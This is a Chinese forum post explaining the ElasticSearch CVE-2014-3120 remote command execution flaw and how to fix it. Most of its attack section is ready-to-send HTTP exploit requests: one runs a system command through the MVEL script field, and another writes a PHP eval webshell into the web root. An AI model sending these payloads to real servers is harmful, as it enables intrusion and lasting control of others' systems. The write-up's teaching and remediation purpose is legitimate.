| 网站首页 | 业界新闻 | 小组 | 威客 | 人才 | 下载频道 | 博客 | 代码贴 | 在线编程 | 编程论坛
欢迎加入我们,一同切磋技术
用户名:   
 
密 码:  
共有 1573 人关注过本帖
标题:ElasticSearch 命令执行漏洞(CVE-2014-3120)
只看楼主 加入收藏
源哥
Rank: 1
等 级:新手上路
帖 子:15
专家分:0
注 册:2019-9-5
收藏
 问题点数:0 回复次数:0 
ElasticSearch 命令执行漏洞(CVE-2014-3120)
ElasticSearch简介
 
        ElasticSearch是一个基于Lucene构建的开源,分布式,RESTful搜索引擎。设计用于云计算中,能够达到实时搜索,稳定,可靠,快速,安装使用方便。支持通过HTTP使用JSON进行数据索引。
 
CVE-2014-3120原理
        
 
        ElasticSearch有脚本执行的功能,使用的引擎为MVEL,该引擎没有做任何的防护,或者沙盒包装,所以可以直接执行任意代码。
 
由于在ElasticSearch的默认配置下,动态脚本执行功能处于打开状态,导致用户可以构造恶意的请求包,执行任意代码。
 
漏洞测试     
 
ElasticSearch版本:v1.1.1
 
利用该漏洞之前,es至少需要存在一条数据,通过以下请求包创建数据:
 
POST /mitian/mitian6/ HTTP/1.1Host: 192.168.0.16:9200Accept: */*Accept-Language: enUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:60.0) Gecko/20100101 Firefox/60.0Connection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 22{  "name": "kjsx"}
 
通过构造特定的数据包,执行任意命令:
 
POST /_search?pretty HTTP/1.1Host: 192.168.0.16:9200Accept: */*Accept-Language: enUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)Connection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 357{    "size": 1,    "query": {      "filtered": {        "query": {          "match_all": {          }        }      }    },    "script_fields": {        "command": {            "script": "import *;new java.util.Scanner(Runtime.getRuntime().exec(\"pwd\").getInputStream()).useDelimiter(\"\\\\A\").next();"        }    }}
 
getshell   
 
既然可以执行任意命令,那我们尝试一下getshell
 
假设服务器运行着其它web服务,那么我们可以利用该漏洞把webshell写入到web目录下,请求如下:
 
POST /_search?pretty HTTP/1.1
 
Host: 192.168.0.16:9200
 
Accept: */*
 
Accept-Language: en
 
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
 
Connection: close
 
Content-Type: application/x-www-form-urlencoded
 
Content-Length: 445
 
 
 
{
 
    "size": 1,
 
    "query": {
 
      "filtered": {
 
        "query": {
 
          "match_all": {
 
          }
 
        }
 
      }
 
    },
 
    "script_fields": {
 
        "command": {
 
            "script": "import java.util.*;import *;PrintWriter writer = new PrintWriter(new BufferedWriter(new FileWriter(\"/var/www/html/mitian.php\", true)));writer.println(\"<?php @eval($_POST['kjsx']);?>\");writer.close();"
 
        }
 
    }
 
}
 
利用蚁剑,成功连接该webshell:
 
漏洞修复   
 
1、在配置文件config/elasticsearch.yml中,添加一行
 
script.disable_dynamic: true并重启服务
 
2、升级ElasticSearch到1.2版本以上
收到的鲜花
  • 静夜思2020-12-21 20:26 送鲜花  1朵  
搜索更多相关主题的帖子: 命令 漏洞 执行 java new 
2019-09-26 10:40
快速回复:ElasticSearch 命令执行漏洞(CVE-2014-3120)
数据加载中...
 
   



关于我们 | 广告合作 | 编程中国 | 清除Cookies | TOP | 手机版

编程中国 版权所有,并保留所有权利。
Powered by Discuz, Processed in 0.015303 second(s), 9 queries.
Copyright©2004-2024, BCCN.NET, All Rights Reserved